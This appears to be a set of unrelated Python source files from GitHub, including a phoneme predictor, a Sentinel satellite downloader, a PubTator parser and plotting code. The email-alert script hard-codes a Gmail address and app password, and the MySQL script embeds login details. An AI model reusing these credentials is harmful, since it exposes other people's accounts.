argparse.ArgumentParser(prog=\"g2p_phonetisaurus\")\n\n # Create subparsers for each sub-command\n sub_parsers = parser.add_subparsers()\n sub_parsers.required = True\n sub_parsers.dest = \"command\"\n\n # -------\n # Predict\n # -------\n predict_parser = sub_parsers.add_parser(\n \"predict\", help=\"Predict phonemes for word(s)\"\n )\n predict_parser.add_argument(\n \"--graph\", required=True, help=\"Path to graph npz file from fst2npy.py\"\n )\n predict_parser.add_argument(\n \"words\", nargs=\"*\", help=\"Words to guess pronunciations for\"\n )\n predict_parser.add_argument(\n \"--max-guesses\",\n default=1,\n type=int,\n help=\"Maximum number of guesses per word (default: 1)\",\n )\n predict_parser.add_argument(\n \"--beam\",\n default=500,\n type=int,\n help=\"Initial width of search beam (default: 500)\",\n )\n predict_parser.add_argument(\n \"--min-beam\",\n default=100,\n type=int,\n help=\"Minimum width of search beam (default: 100)\",\n )\n predict_parser.add_argument(\n \"--beam-scale\",\n default=0.6,\n type=float,\n help=\"Scalar multiplied by beam after each step (default: 0.6)\",\n )\n predict_parser.add_argument(\n \"--grapheme-separator\",\n default=\"\",\n help=\"Separator between input graphemes (default: none)\",\n )\n predict_parser.add_argument(\n \"--phoneme-separator\",\n default=\" \",\n help=\"Separator between output phonemes (default: space)\",\n )\n predict_parser.add_argument(\n \"--preload-graph\",\n action=\"store_true\",\n help=\"Preload graph into memory before starting\",\n )\n predict_parser.set_defaults(func=do_predict)\n\n # ----\n # Test\n # ----\n test_parser = sub_parsers.add_parser(\"test\", help=\"Test G2P model on a lexicon\")\n test_parser.add_argument(\n \"--graph\", required=True, help=\"Path to graph npz file from fst2npy.py\"\n )\n test_parser.add_argument(\n \"texts\", nargs=\"*\", help=\"Lines with ' ...'\"\n )\n test_parser.add_argument(\n \"--beam\",\n default=500,\n type=int,\n help=\"Initial width of search beam (default: 500)\",\n )\n test_parser.add_argument(\n \"--min-beam\",\n default=100,\n type=int,\n help=\"Minimum width of search beam (default: 100)\",\n )\n test_parser.add_argument(\n \"--beam-scale\",\n default=0.6,\n type=float,\n help=\"Scalar multiplied by beam after each step (default: 0.6)\",\n )\n test_parser.add_argument(\n \"--preload-graph\",\n action=\"store_true\",\n help=\"Preload graph into memory before starting\",\n )\n test_parser.set_defaults(func=do_test)\n\n # ----------------\n # Shared arguments\n # ----------------\n for sub_parser in [predict_parser, test_parser]:\n sub_parser.add_argument(\n \"--debug\", action=\"store_true\", help=\"Print DEBUG messages to console\"\n )\n\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n _LOGGER.debug(args)\n\n args.func(args)\n\n\n# -----------------------------------------------------------------------------\n\n\ndef do_predict(args):\n \"\"\"Predict phonemes for words\"\"\"\n args.graph = Path(args.graph)\n\n _LOGGER.debug(\"Loading graph from %s\", args.graph)\n phon_graph = PhonetisaurusGraph.load(args.graph, preload=args.preload_graph)\n\n if args.words:\n # Arguments\n words = args.words\n _LOGGER.info(\"Guessing pronunciations for %s word(s)\", len(words))\n else:\n # Standard input\n words = sys.stdin\n\n if os.isatty(sys.stdin.fileno()):\n print(\"Reading words from stdin...\", file=sys.stderr)\n\n # Guess pronunciations\n for word, graphemes, phonemes in phon_graph.g2p(\n words,\n grapheme_separator=args.grapheme_separator,\n max_guesses=args.max_guesses,\n beam=args.beam,\n min_beam=args.min_beam,\n beam_scale=args.beam_scale,\n ):\n if not phonemes:\n _LOGGER.warning(\"No pronunciation for %s (%s)\", word, graphemes)\n continue\n\n print(word, args.phoneme_separator.join(phonemes))\n\n\n# -----------------------------------------------------------------------------\n\n\ndef do_test(args):\n \"\"\"Test performance relative a known lexicon\"\"\"\n try:\n from rapidfuzz.distance.Levenshtein import distance as levenshtein\n except ImportError as e:\n _LOGGER.critical(\"rapidfuzz library is needed for levenshtein distance\")\n _LOGGER.critical(\"pip install 'rapidfuzz>=2.11.1'\")\n raise e\n\n args.graph = Path(args.graph)\n\n _LOGGER.debug(\"Loading graph from %s\", args.graph)\n phon_graph = PhonetisaurusGraph.load(args.graph, preload=args.preload_graph)\n\n if args.texts:\n lines = args.texts\n else:\n lines = sys.stdin\n\n if os.isatty(sys.stdin.fileno()):\n print(\"Reading lexicon lines from stdin...\", file=sys.stderr)\n\n # Load lexicon\n lexicon = {}\n for line in lines:\n line = line.strip()\n if (not line) or (\" \" not in line):\n continue\n\n word, actual_phonemes = line.split(maxsplit=1)\n lexicon[word] = actual_phonemes\n\n # Predict phonemes\n predicted_phonemes = {}\n start_time = time.perf_counter()\n\n for word in lexicon:\n for _, _, guessed_phonemes in phon_graph.g2p(\n [word],\n beam=args.beam,\n min_beam=args.min_beam,\n beam_scale=args.beam_scale,\n max_guesses=1,\n ):\n predicted_phonemes[word] = \" \".join(guessed_phonemes)\n\n # Only one guess\n break\n\n end_time = time.perf_counter()\n\n # Calculate PER\n num_errors = 0\n num_missing = 0\n num_phonemes = 0\n\n for word, actual_phonemes in lexicon.items():\n expected_phonemes = predicted_phonemes.get(word, \"\")\n\n if expected_phonemes:\n distance = levenshtein(expected_phonemes, actual_phonemes)\n num_errors += distance\n num_phonemes += len(actual_phonemes)\n else:\n num_missing += 1\n _LOGGER.warning(\"No pronunciation for %s\", word)\n\n assert num_phonemes > 0, \"No phonemes were read\"\n\n # Calculate results\n per = round(num_errors / num_phonemes, 2)\n wps = round(len(predicted_phonemes) / (end_time - start_time), 2)\n print(\"PER:\", per, \"Errors:\", num_errors, \"words/sec:\", wps)\n\n if num_missing > 0:\n print(\"Total missing:\", num_missing)\n\n\n# -----------------------------------------------------------------------------\n\n_NOT_FINAL = object()\n\n\nclass PhonetisaurusGraph:\n \"\"\"Graph of numpy arrays that represents a Phonetisaurus FST\n\n Also contains shared cache of edges and final state probabilities.\n These caches are necessary to ensure that the .npz file stays small and fast\n to load.\n \"\"\"\n\n def __init__(self, graph: NUMPY_GRAPH, preload: bool = False):\n self.graph = graph\n\n self.start_node = int(self.graph[\"start_node\"].item())\n\n # edge_index -> (from_node, to_node, ilabel, olabel)\n self.edges = self.graph[\"edges\"]\n self.edge_probs = self.graph[\"edge_probs\"]\n\n # int -> [str]\n self.symbols = []\n for symbol_str in self.graph[\"symbols\"]:\n symbol_list = symbol_str.replace(\"_\", \"\").split(\"|\")\n self.symbols.append((len(symbol_list), symbol_list))\n\n # nodes that are accepting states\n self.final_nodes = self.graph[\"final_nodes\"]\n\n # node -> probability\n self.final_probs = self.graph[\"final_probs\"]\n\n # Cache\n self.preloaded = preload\n self.out_edges: typing.Dict[int, typing.List[int]] = defaultdict(list)\n self.final_node_probs: typing.Dict[int, typing.Any] = {}\n\n if preload:\n # Load out edges\n for edge_idx, (from_node, *_) in enumerate(self.edges):\n self.out_edges[from_node].append(edge_idx)\n\n # Load final probabilities\n self.final_node_probs.update(zip(self.final_nodes, self.final_probs))\n\n @staticmethod\n def load(graph_path: typing.Union[str, Path], **kwargs) -> \"PhonetisaurusGraph\":\n \"\"\"Load .npz file with numpy graph\"\"\"\n np_graph = np.load(graph_path, allow_pickle=True)\n return PhonetisaurusGraph(np_graph, **kwargs)\n\n def g2p(\n self, words: typing.Iterable[typing.Union[str, typing.Sequence[str]]], **kwargs\n ) -> typing.Iterable[\n typing.Tuple[\n typing.Union[str, typing.Sequence[str]],\n typing.Sequence[str],\n typing.Sequence[str],\n ],\n ]:\n \"\"\"Guess phonemes for words\"\"\"\n for word in words:\n for graphemes, phonemes in self.g2p_one(word, **kwargs):\n yield word, graphemes, phonemes\n\n def g2p_one(\n self,\n word: typing.Union[str, typing.Sequence[str]],\n eps: str = \"\",\n beam: int = 5000,\n min_beam: int = 100,\n beam_scale: float = 0.6,\n grapheme_separator: str = \"\",\n max_guesses: int = 1,\n ) -> typing.Iterable[typing.Tuple[typing.Sequence[str], typing.Sequence[str]]]:\n \"\"\"Guess phonemes for word\"\"\"\n current_beam = beam\n graphemes: typing.Sequence[str] = []\n\n if isinstance(word, str):\n word = word.strip()\n\n if grapheme_separator:\n graphemes = word.split(grapheme_separator)\n else:\n graphemes = list(word)\n else:\n graphemes = word\n\n if not graphemes:\n return graphemes, []\n\n # (prob, node, graphemes, phonemes, final, beam)\n q: typing.List[\n typing.Tuple[\n float,\n typing.Optional[int],\n typing.Sequence[str],\n typing.List[str],\n bool,\n ]\n ] = [(0.0, self.start_node, graphemes, [], False)]\n\n q_next: typing.List[\n typing.Tuple[\n float,\n typing.Optional[int],\n typing.Sequence[str],\n typing.List[str],\n bool,\n ]\n ] = []\n\n # (prob, phonemes)\n best_heap: typing.List[typing.Tuple[float, typing.Sequence[str]]] = []\n\n # Avoid duplicate guesses\n guessed_phonemes: typing.Set[typing.Tuple[str, ...]] = set()\n\n while q:\n done_with_word = False\n q_next = []\n\n for prob, node, next_graphemes, output, is_final in q:\n if is_final:\n # Complete guess\n phonemes = tuple(output)\n if phonemes not in guessed_phonemes:\n best_heap.append((prob, phonemes))\n guessed_phonemes.add(phonemes)\n\n if len(best_heap) >= max_guesses:\n done_with_word = True\n break\n\n continue\n\n assert node is not None\n\n if not next_graphemes:\n if self.preloaded:\n final_prob = self.final_node_probs.get(node, _NOT_FINAL)\n else:\n final_prob = self.final_node_probs.get(node)\n if final_prob is None:\n final_idx = int(np.searchsorted(self.final_nodes, node))\n if self.final_nodes[final_idx] == node:\n # Cache\n final_prob = float(self.final_probs[final_idx])\n self.final_node_probs[node] = final_prob\n else:\n # Not a final state\n final_prob = _NOT_FINAL\n self.final_node_probs[node] = final_prob\n\n if final_prob != _NOT_FINAL:\n final_prob = typing.cast(float, final_prob)\n q_next.append((prob + final_prob, None, [], output, True))\n\n len_next_graphemes = len(next_graphemes)\n if self.preloaded:\n # Was pre-loaded in __init__\n edge_idxs = self.out_edges[node]\n else:\n # Build cache during search\n maybe_edge_idxs = self.out_edges.get(node)\n if maybe_edge_idxs is None:\n edge_idx = int(np.searchsorted(self.edges[:, 0], node))\n edge_idxs = []\n while self.edges[edge_idx][0] == node:\n edge_idxs.append(edge_idx)\n edge_idx += 1\n\n # Cache\n self.out_edges[node] = edge_idxs\n else:\n edge_idxs = maybe_edge_idxs\n\n for edge_idx in edge_idxs:\n _, to_node, ilabel_idx, olabel_idx = self.edges[edge_idx]\n out_prob = self.edge_probs[edge_idx]\n\n len_igraphemes, igraphemes = self.symbols[ilabel_idx]\n\n if len_igraphemes > len_next_graphemes:\n continue\n\n if igraphemes == [eps]:\n item = (prob + out_prob, to_node, next_graphemes, output, False)\n q_next.append(item)\n else:\n sub_graphemes = next_graphemes[:len_igraphemes]\n if igraphemes == sub_graphemes:\n _, olabel = self.symbols[olabel_idx]\n item = (\n prob + out_prob,\n to_node,\n next_graphemes[len(sub_graphemes) :],\n output + olabel,\n False,\n )\n q_next.append(item)\n\n if done_with_word:\n break\n\n q_next = sorted(q_next, key=lambda item: item[0])[:current_beam]\n q = q_next\n\n current_beam = max(min_beam, (int(current_beam * beam_scale)))\n\n # Yield guesses\n if best_heap:\n for _, guess_phonemes in sorted(best_heap, key=lambda item: item[0])[\n :max_guesses\n ]:\n yield graphemes, [p for p in guess_phonemes if p]\n else:\n # No guesses\n yield graphemes, []\n\n\n# -----------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rhasspy/gruut","sub_path":"gruut/g2p_phonetisaurus.py","file_name":"g2p_phonetisaurus.py","file_ext":"py","file_size_in_byte":15377,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"2"} +{"seq_id":"30841713782","text":"# coding: utf-8\n\nfrom distutils.core import setup\nimport py2exe\n\nOPTIONS = [\n {\n \"script\": \"printsrv_exe.py\",\n \"dest_base\": \"printsrv\"\n }]\n\nsetup(\n options = {'py2exe': {'bundle_files': 1}},\n zipfile = None,\n console = OPTIONS\n)\n\n# run\n# build_printsrv_exe.py py2exe\n","repo_name":"Piletilevi/printsrv-lit","sub_path":"build_printsrv_exe.py","file_name":"build_printsrv_exe.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21813855975","text":"#Definition of inputs and outputs\n#==================================\n##Sentinel Download=group\n##Download Sentinel=name\n##ParameterString|USER|Username|\n##ParameterString|PASSWORD|Password|\n##ParameterString|START|Start date (YYYYMMDD)|NOW-1DAY|False|True\n##ParameterString|END|End date (YYYYMMDD)|NOW|False|True\n##ParameterSelection|SENTINEL|Sentinel satellite constellation|any;1;2;3|0\n##ParameterExtent|EXTENT|Area of interest extent (geographic coordinates)||True\n##ParameterFile|GEOMETRY_SHP|Area of interest .shp file (geographic coordinates - WGS84)|False|True|shp\n##ParameterFile|GEOMETRY_GJ|Area of interest .geojson file|False|True|geojson\n##ParameterNumber|CLOUD|Maximum cloud cover in percent|0|100|0|True\n##*ParameterSelection|INSTRUMENT|Instrument|any;MSI;SAR-CSAR;SLSTR;OLCI;SRAL|0\n##*ParameterSelection|PRODUCTTYPE|Product type|any;SLC;GRD;OCN;RAW;S2MSI1C;S2MSI2Ap|0\n##*ParameterString|UUID|Select products by UUID (comma-separated)||False|True\n##*ParameterString|NAME|Select products by filename (supports wildcards)||False|True\n##*ParameterString|QUERY|Extra search keywords. Example: 'producttype=GRD,polarisationmode=HH'||False|True\n##*ParameterString|URL|DHuS URL|https://scihub.copernicus.eu/apihub/|False|True\n##ParameterNumber|LIMIT|Maximum number of products|0|100000|0|True\n##ParameterBoolean|DOWNLOAD|Download all results of the query|False\n##ParameterBoolean|FOOTPRINTS|Create geojson file search_footprints.geojson with footprints and metadata|False\n##OutputDirectory|PATH|Set the path where the the files will be saved\nimport os\nimport logging\n\nlogger = logging.getLogger('sentinelsat')\n\nlogger_set = False # only set once\n\n_PROGRESS = progress # from magic qgis namespace\n\n\ndef _extent_from_shpfile(path):\n import ogr\n drv = ogr.GetDriverByName('ESRI Shapefile')\n ds = drv.Open(path)\n if ds is None:\n raise IOError('Reading {} failed.'.format(path))\n try:\n layer = ds.GetLayer()\n extent = layer.GetExtent()\n extent_str = str(extent)[1:-1].replace(' ', '')\n finally:\n ds.Destroy()\n return extent_str\n\n\ndef _extent_to_wkt(extent_str):\n return (\n 'POLYGON(({0} {2},{1} {2},{1} {3},{0} {3},{0} {2}))'\n .format(*extent_str.split(',')))\n\n\nif GEOMETRY_SHP:\n EXTENT = _extent_from_shpfile(GEOMETRY_SHP)\n\n\nkwargs = dict(\n start=START or None,\n end=END or None,\n area_wkt=_extent_to_wkt(EXTENT) if EXTENT else None,\n geometry=GEOMETRY_GJ or None,\n user=USER,\n password=PASSWORD,\n url=URL,\n uuid=UUID or None,\n name=NAME or None,\n sentinel=[None, '1', '2', '3'][SENTINEL],\n instrument=[None, 'MSI', 'SAR-C SAR', 'SLSTR', 'OLCI', 'SRAL'][INSTRUMENT],\n producttype=[None, 'SLC', 'GRD', 'OCN', 'RAW', 'S2MSI1C', 'S2MSI2Ap'][PRODUCTTYPE],\n cloud=CLOUD or None,\n query=QUERY or None,\n limit=LIMIT or None,\n download=DOWNLOAD,\n path=PATH,\n footprints=FOOTPRINTS)\n\n\nclass ProgressHandler(logging.StreamHandler):\n\n def __init__(self, progress):\n super(self.__class__, self).__init__()\n self.progress = progress\n\n def emit(self, record):\n msg = self.format(record)\n try:\n self.progress.setConsoleInfo(msg)\n except RuntimeError:\n pass # no logging\n\n\nclass ProgressBar(object):\n\n def __init__(self, total, initial=0.0, *args, **kwargs):\n self.qgis_progress = _PROGRESS\n self.value = initial\n self.total = total\n self.qgis_progress.setPercentage(self._get_percent())\n\n def _get_percent(self):\n return float(self.value) / self.total * 100\n\n def update(self, increment):\n self.value += increment\n self.qgis_progress.setPercentage(self._get_percent())\n\n def close(self):\n pass\n\n\ndef _set_logger_handler(qgis_progress, level='INFO'):\n global logger_set\n if logger_set:\n return\n logger.setLevel(level)\n h = ProgressHandler(qgis_progress)\n h.setLevel(level)\n fmt = logging.Formatter('%(message)s')\n h.setFormatter(fmt)\n logger.addHandler(h)\n logger_set = True\n\n\ndef _load_to_canvas(path):\n if path is not None and os.path.isfile(path):\n from processing.tools import dataobjects\n dataobjects.load(path, os.path.basename(path))\n\n\ndef cli(user, password, geometry, start, end, uuid, name, download, sentinel, producttype,\n instrument, cloud, footprints, path, query, url, limit,\n area_wkt,\n order_by=None):\n \"\"\"Search for Sentinel products and, optionally, download all the results\n and/or create a geojson file with the search result footprints.\n Beyond your Copernicus Open Access Hub user and password, you must pass a geojson file\n containing the geometry of the area you want to search for or the UUIDs of the products. If you\n don't specify the start and end dates, it will search in the last 24 hours.\n \"\"\"\n import geojson as gj\n from sentinelsat.sentinel import SentinelAPI, SentinelAPIError, geojson_to_wkt, read_geojson\n\n returns = {} # information to return\n\n api = SentinelAPI(user, password, url)\n api._tqdm = ProgressBar\n\n search_kwargs = {}\n if sentinel and not (producttype or instrument):\n search_kwargs[\"platformname\"] = \"Sentinel-\" + sentinel\n\n if instrument and not producttype:\n search_kwargs[\"instrumentshortname\"] = instrument\n\n if producttype:\n search_kwargs[\"producttype\"] = producttype\n\n if cloud:\n if sentinel not in ['2', '3']:\n logger.error('Cloud cover is only supported for Sentinel 2 and 3.')\n raise ValueError('Cloud cover is only supported for Sentinel 2 and 3.')\n search_kwargs[\"cloudcoverpercentage\"] = (0, cloud)\n\n if query is not None:\n search_kwargs.update((x.split('=') for x in query.split(',')))\n\n if area_wkt is not None: # Pass through area_wkt\n search_kwargs['area'] = area_wkt\n elif geometry is not None:\n search_kwargs['area'] = geojson_to_wkt(read_geojson(geometry))\n\n if uuid is not None:\n uuid_list = [x.strip() for x in uuid.split(',')]\n products = {}\n for productid in uuid_list:\n try:\n products[productid] = api.get_product_odata(productid)\n except SentinelAPIError as e:\n if 'Invalid key' in e.msg:\n logger.error('No product with ID \\'%s\\' exists on server', productid)\n elif name is not None:\n search_kwargs[\"identifier\"] = name\n products = api.query(order_by=order_by, limit=limit, **search_kwargs)\n else:\n start = start or \"19000101\"\n end = end or \"NOW\"\n products = api.query(date=(start, end),\n order_by=order_by, limit=limit, **search_kwargs)\n\n if footprints is True:\n footprints_geojson = api.to_geojson(products)\n footprints_file = os.path.join(path, \"search_footprints.geojson\")\n with open(footprints_file, \"w\") as outfile:\n outfile.write(gj.dumps(footprints_geojson))\n returns['footprints_file'] = footprints_file\n\n if download is True:\n product_infos, failed_downloads = api.download_all(products, path)\n if len(failed_downloads) > 0:\n with open(os.path.join(path, \"corrupt_scenes.txt\"), \"w\") as outfile:\n for failed_id in failed_downloads:\n outfile.write(\"%s : %s\\n\" % (failed_id, products[failed_id]['title']))\n else:\n for product_id, props in products.items():\n if uuid is None:\n logger.info('Product %s - %s', product_id, props['summary'])\n else: # querying uuids has no summary key\n logger.info('Product %s - %s - %s MB', product_id, props['title'],\n round(int(props['size']) / (1024. * 1024.), 2))\n if uuid is None:\n logger.info('---')\n logger.info('%s scenes found with a total size of %.2f GB',\n len(products), api.get_products_size(products))\n\n return returns\n\n\n_set_logger_handler(_PROGRESS)\nlogger.debug(kwargs)\nreturns = cli(**kwargs)\n_load_to_canvas(returns.get('footprints_file', None))\n","repo_name":"sentinelsat/sentinelsat-qgis-script","sub_path":"sentinelsat_qgis_script.py","file_name":"sentinelsat_qgis_script.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"38275265244","text":"import logging\r\nimport re\r\nfrom typing import List, Generator, TextIO, Iterator, Union\r\n\r\nfrom bioc.pubtator.datastructure import PubTator, PubTatorAnn, PubTatorRel\r\n\r\nABSTRACT_PATTERN = re.compile(r'(.*?)\\|a\\|(.*)')\r\nTITLE_PATTERN = re.compile(r'(.*?)\\|t\\|(.*)')\r\n\r\n\r\ndef loads(s: str) -> List[PubTator]:\r\n \"\"\"\r\n Parse s (a str) to a list of Pubtator documents\r\n\r\n :return: a list of PubTator documents\r\n \"\"\"\r\n return list(iterparse_s(s.splitlines()))\r\n\r\n\r\ndef load(fp: TextIO) -> List[PubTator]:\r\n \"\"\"\r\n Parse file-like object to a list of Pubtator documents\r\n\r\n :param fp: file-like object\r\n :return: a list of PubTator documents\r\n \"\"\"\r\n return loads(fp.read())\r\n\r\n\r\ndef iterparse_s(line_iterator: Iterator[str]) \\\r\n -> Generator[PubTator, None, None]:\r\n \"\"\"\r\n Iterative parse each line\r\n \"\"\"\r\n logger = logging.getLogger(__name__)\r\n doc = PubTator()\r\n i = 0\r\n for i, line in enumerate(line_iterator, 1):\r\n if i % 100000 == 0:\r\n logger.debug('Read %d lines', i)\r\n line = line.strip()\r\n if not line:\r\n if doc.pmid and (doc.title or doc.abstract):\r\n yield doc\r\n doc = PubTator()\r\n continue\r\n matcher = TITLE_PATTERN.match(line)\r\n if matcher:\r\n doc.pmid = matcher.group(1)\r\n doc.title = matcher.group(2)\r\n continue\r\n matcher = ABSTRACT_PATTERN.match(line)\r\n if matcher:\r\n doc.pmid = matcher.group(1)\r\n doc.abstract = matcher.group(2)\r\n continue\r\n toks = line.split('\\t')\r\n if len(toks) >= 6:\r\n annotation = loads_ann(toks)\r\n doc.add_annotation(annotation)\r\n elif len(toks) == 4:\r\n relation = PubTatorRel(toks[0], toks[1], toks[2], toks[3])\r\n doc.add_relation(relation)\r\n elif len(toks) == 5:\r\n relation = PubTatorRel(toks[0], toks[1], toks[2], toks[3], toks[4])\r\n doc.add_relation(relation)\r\n else:\r\n print('%i: Cannot parse: \"%r\"' % (i, line))\r\n\r\n if doc.pmid and (doc.title or doc.abstract):\r\n yield doc\r\n logger.debug('Read %d lines', i)\r\n\r\n\r\ndef iterparse(fp: TextIO) -> Generator[PubTator, None, None]:\r\n \"\"\"\r\n Iteratively parse fp (file-like object) in pubtator format\r\n \"\"\"\r\n return iterparse_s(fp)\r\n\r\n\r\ndef loads_ann(s: Union[str, List[str]]) -> PubTatorAnn:\r\n \"\"\"\r\n Parse s (a str) in the Pubtator annotation format\r\n \"\"\"\r\n if isinstance(s, str):\r\n toks = s.split('\\t')\r\n else:\r\n toks = s\r\n\r\n if len(toks) == 6:\r\n return PubTatorAnn(pmid=toks[0], start=int(toks[1]), end=int(toks[2]),\r\n text=toks[3], type=toks[4], id=toks[5])\r\n\r\n if len(toks) == 7 and '|' in toks[5] and '|' in toks[6]:\r\n ids = toks[5].split('|')\r\n texts = toks[6].split('|')\r\n if len(ids) != len(texts):\r\n raise ValueError('Cannot parse entity. %s concept but %s text. %s'\r\n % (len(ids), len(texts), s))\r\n return PubTatorAnn(pmid=toks[0], start=int(toks[1]), end=int(toks[2]),\r\n text=toks[3], type=toks[4], id=toks[5])\r\n\r\n if len(toks) == 7:\r\n return PubTatorAnn(toks[0], int(toks[1]), int(toks[2]), toks[3],\r\n toks[4], toks[5], toks[6:])\r\n\r\n raise ValueError('Cannot parse: %s' % s)\r\n","repo_name":"bionlplab/bioc","sub_path":"src/bioc/pubtator/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"2"} +{"seq_id":"18153244743","text":"import logging\nimport subprocess\n\nimport os\nimport sys\n\nfrom ._base_service_controller import ServiceControllerBase\nfrom ..default_settings import WAIT_TIME_MULTIPLIER\n\nWA_SERVICE_SCRIPT = os.getenv(\"WA_SERVICE_SCRIPT\")\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass ServiceController(ServiceControllerBase):\n\n _subprocess = None\n\n def start_service(self):\n assert WA_SERVICE_SCRIPT is not None, repr(WA_SERVICE_SCRIPT)\n params = WA_SERVICE_SCRIPT.split(\"|\")\n # self._subprocess might already exist but have crashed\n command = [sys.executable] + params\n cwd = os.path.dirname(params[0] if params else sys.executable) or None\n logger.info(\"GUI is launching service via Popen command %r, in cwd %r\", command, cwd)\n self._subprocess = subprocess.Popen(command, shell=False, cwd=cwd)\n\n def stop_service(self):\n self._send_message(\"/stop_server\")\n if self._subprocess: # Else, service already existed at App launch... give up\n try:\n self._subprocess.wait(timeout=10 * WAIT_TIME_MULTIPLIER)\n except subprocess.TimeoutExpired:\n logger.error(\"Service subprocess didn't exit gracefully, we kill it now\")\n self._subprocess.kill()\n","repo_name":"WitnessAngel/witness-angel-components","sub_path":"src/wacomponents/service_control/_subprocess_service_controller.py","file_name":"_subprocess_service_controller.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7791916189","text":"import smtplib\nfrom email.message import EmailMessage\n\ndef send_mail_onfail(dag_id):\n smtp_server = smtplib.SMTP('smtp.gmail.com', 587)\n smtp_server.starttls()\n smtp_server.login('xrrishdummy@gmail.com', 'fapizjbrcbhnkhfi')\n\n message = EmailMessage()\n message['From'] = 'xrrishdummy@gmail.com'\n message['To'] = 'krishgoal2000@gmail.com'\n message['Subject'] = '! Dag failing ALert !!'\n message.set_content('The dag_id has been failed')\n\n smtp_server.send_message(message, 'xrrishdummy@gmail.com', 'krishgoal2000@gmail.com')\n\n smtp_server.quit()","repo_name":"krrish1311/Airflow-Dags","sub_path":"indrajeet_bhaiyaa.py","file_name":"indrajeet_bhaiyaa.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38986560539","text":"import pandas as pd\nimport sys\nsys.path.append('../')\ndata = pd.read_csv('HINDALCO.csv', index_col=False, delimiter = ',')\ndata.head()\n\nimport mysql.connector as msql\nfrom mysql.connector import Error\n\ntry:\n\tconn = msql.connect(host='localhost', database='assignment', user='prince', password='123456789')\n\tcursor = conn.cursor()\n\tcursor.execute(\"select database();\")\n\trecord = cursor.fetchone()\n\tprint(\"You're connected to database: \",record)\n\tcursor.execute('DROP TABLE IF EXISTS hinda;')\n\tprint('Creating table....')\n\n\tcursor.execute(\"CREATE TABLE hinda(datetime datetime,close decimal, high decimal,low decimal, open decimal,volume int,instrument char(25))\")\n\tprint(\"Table is created....\")\n\n\n\tfor i,row in data.iterrows():\n\t\t\t\tsql = \"INSERT INTO assignment.hinda VALUES (%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\tcursor.execute(sql, tuple(row))\n\t\t\t\t\n\t\t\t\t# the connection is not autocommitted by default, so we must commit to save our changes\n\t\t\t\tconn.commit()\n\tprint(\"Record inserted\")\n\t\nexcept Error as e:\n print(\"Error while connecting to MySQL\", e)","repo_name":"princeuche1/SMA-trading-strategy","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27707159116","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 16 17:30:12 2020\r\n\r\n@author: ANSQUER\r\n@author: ROOS\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.signal as sig\r\n\r\n\r\nKs = [-1, 2,0.5] # coefficient multiplicateur au numérateur sans unité (ce sera votre T0 ou votre Tinfini)\r\nfc = 2000 # fréquence de cassure en Hz\r\n\r\nwc = 2*np.pi*fc\r\nw = np.logspace(1,7,1000) # permet de répartir les points de calculs régulièrement sur une echelle log. ici : 1000points de 10^1 à 10^7\r\nf = w/2/np.pi #génération d'un autre tableur de valeurs en Hz,correleées à w permettant un affichage des Bode en Hz\r\n\r\n\r\nfor K in Ks:\r\n den = [1/wc,1] #denominateur sous forme canonique : le 1er terme est d'ordre 1, le 2e d'ordre 0\r\n numLP=[K] #numerateur d'un passe bas\r\n numHP=[K/wc, 0] #numerateur d'un passe haut\r\n H=sig.lti(numHP,den) # definition du système linéaire à étudier , vous choisissez votre numérateur\r\n w, T = H.freqresp(w=w) #T représente la fonction de transfert complexe du systeme linéaire\r\n\r\n\r\n # diagrammes de Bode\r\n plt.figure(1)\r\n C1 = plt.loglog(f, abs(T), label =\"module\") #generation de la courbe de module en fonction de f\r\n C2 = plt.loglog(f, (abs(K)*np.ones(len(f))),color=\"blue\", dashes=[6, 2],label =\"THF\" ) #asymptote BF (cas du passe bas) de module en pointillés\r\n C3 = plt.loglog(f, abs(K*f/fc),color=\"green\", dashes=[6, 2],label =\"TBF\" )\r\n plt.xlabel(\"f(Hz)\")\r\n plt.ylabel(\"amplification\")\r\n plt.grid()\r\n plt.legend()\r\n\r\n\r\n plt.figure(2)\r\n C4= plt.semilogx(f,(180*np.angle(T))/np.pi, label =\"argument\") #generation de la courbe d'argument en fonction de f\r\n plt.xlabel(\"f(Hz)\")\r\n plt.ylabel(\"déphasage\")\r\n plt.grid()\r\n plt.legend()\r\n\r\n\r\n\r\n # reponse indicielle\r\n t_e = np.arange(0,10/wc,0.000001) #création du tableau d'instants pour le calcul : de -1/wc à 10/w0 avec des intervalles de 1µs\r\n [t,s] = H.step(T=t_e) # réponse indicielle du système sur la durée t_e\r\n #ajout de 2 points avant t=0 pour mieux visualiser les phénomènes à t =0\r\n t = np.hstack(([-0.001,-0.00001,0],t))\r\n s = np.hstack(([0,0,0],s))\r\n\r\n e = (t>=0) #création d'un vecteur de même taille que t. le code renvoie 0 si faux, 1 si vrai\r\n\r\n plt.figure(3)\r\n plt.plot(t*1000,e,label=\"échelon d'entrée\", color='b') #axe en ms\r\n plt.plot(t*1000,s,label=\"reponse indicielle\", color='r')\r\n plt.grid()\r\n plt.xlabel(\"temps (ms)\")\r\n plt.ylabel('tensions en volts')\r\n plt.grid(which='both', axis='both')\r\n 